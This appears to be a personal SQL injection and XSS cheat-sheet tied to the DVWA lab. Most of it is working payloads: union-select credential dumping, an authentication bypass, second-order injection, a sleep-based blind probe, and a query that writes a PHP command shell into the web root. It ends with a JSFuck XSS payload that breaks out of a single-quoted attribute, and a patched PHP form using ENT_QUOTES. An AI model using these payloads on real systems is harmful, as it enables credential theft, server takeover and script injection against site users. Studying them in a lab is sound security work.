SQL Injection & XSS Playground
This is my playground for SQL injection and XSS.

Classic SQL Injection

Union Select Data Extraction

Probing with order by N for increasing N finds the number of columns the query returns (here 6, since order by 7 errors out); the union select must supply the same number of columns:

```sql
mysql> select * from users where user_id = 1 order by 7;
ERROR 1054 (42S22): Unknown column '7' in 'order clause'
mysql> select * from users where user_id = 1 order by 6;
mysql> select * from users where user_id = 1 union select 1,2,3,4,5,6;
```

```sql
select * from users where user_id = 1 union all select 1,(select group_concat(user,0x3a,password) from users),3,4,5,6;
```

Authentication Bypass

```sql
mysql> select * from users where user='admin' and password='blah' or 1 # 5f4dcc3b5aa765d61d8327deb882cf99'
```

Second Order Injection

```sql
mysql> insert into accounts (username, password, mysignature) values ('admin','mynewpass',(select user())) # 'mynewsignature');
```

Dropping a Backdoor

```sql
mysql> select * from users where user_id = 1 union select all 1,2,3,4,"<?php system($_REQUEST['c']);?>",6 into outfile "/var/www/dvwa/shell.php" #;
```

Conditional Select

```sql
mysql> select * from users where user = (select concat((select if(1>0,'adm','b')),"in"));
```

Bypassing Whitespace Filtering

```sql
mysql> select * from users where user_id = 1/**/union/**/select/**/all/**/1,2,3,4,5,6;
```

Time Based SQL Injection

Sleep Invocation

```sql
mysql> select * from users where user_id = 1 or (select sleep(1)+1);
```

```sql
select * from users where user_id = 1 union select 1,2,3,4,5,sleep(1);
```

XSS

Strtoupper Bypass

Say we have the following PHP code that takes name as a user supplied parameter:
```php
<?php
$input=$_GET['name'];
$sanitized=strtoupper(htmlspecialchars($input));
echo '<form action="">';
echo "First name: <input type='text' name='name' value='".$sanitized."'><br>";
echo "<input type='submit' value='Submit form'></form>";
echo "</HTML></body>";
?>
```

The third line, where $sanitized is computed, is vulnerable to XSS: htmlspecialchars() is called with its default flags, which do not escape the single quote, so we can break out of the single-quoted value attribute with ':
```php
$sanitized=strtoupper(htmlspecialchars($input));
```
For example, if we set the name parameter to the value a', the rendered input shows A'.
Note that the a got converted to a capital A; this is due to the strtoupper function being called on our input. What this means is that any ASCII letters in our JavaScript payload will be converted to uppercase and become invalid, so the payload will not execute (i.e. alert() != ALERT()).
To bypass this constraint, we can encode our payload using JSFuck, which eliminates all the letters from the payload and leaves us with this:
```
A' onmouseover='[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()'
```
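The same form with the attribute escaping fixed, as an added example that is not part of the original page: passing ENT_QUOTES makes htmlspecialchars() escape the single quote as well (on PHP releases before 8.1 the default flags leave ' untouched, which is the defect the bypass above relies on), so the value can no longer close the single-quoted value='...' attribute, and strtoupper() is dropped because it was never a defence.

```php
<?php
// Added example, not the original page's code: the vulnerable form above
// with the output encoding corrected.
//
// The original calls htmlspecialchars($input) with default flags. Before
// PHP 8.1 that default is ENT_COMPAT, which escapes & < > and " but leaves
// ' alone, so a value placed inside value='...' can close the attribute.
// strtoupper() on top of that only changes letters, and a JSFuck payload
// contains none, so it does not help either.
$input = $_GET['name'] ?? '';

// ENT_QUOTES escapes both " and ' (the latter as &#039;), ENT_SUBSTITUTE
// replaces invalid UTF-8 sequences instead of returning an empty string,
// and the charset is stated explicitly rather than relying on the default.
$sanitized = htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

// With the input  A' onmouseover='...  the rendered attribute is now
// value='A&#039; onmouseover=&#039;...' : the quote is inert text and the
// browser sees a single value attribute with no event handler.
echo '<form action="">';
echo "First name: <input type='text' name='name' value='" . $sanitized . "'><br>";
echo "<input type='submit' value='Submit form'></form>";
?>
```

Switching the attribute to double quotes would also block this particular input under the old default flags, but escaping both quote characters is the setting that stays correct regardless of how the template quotes its attributes.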
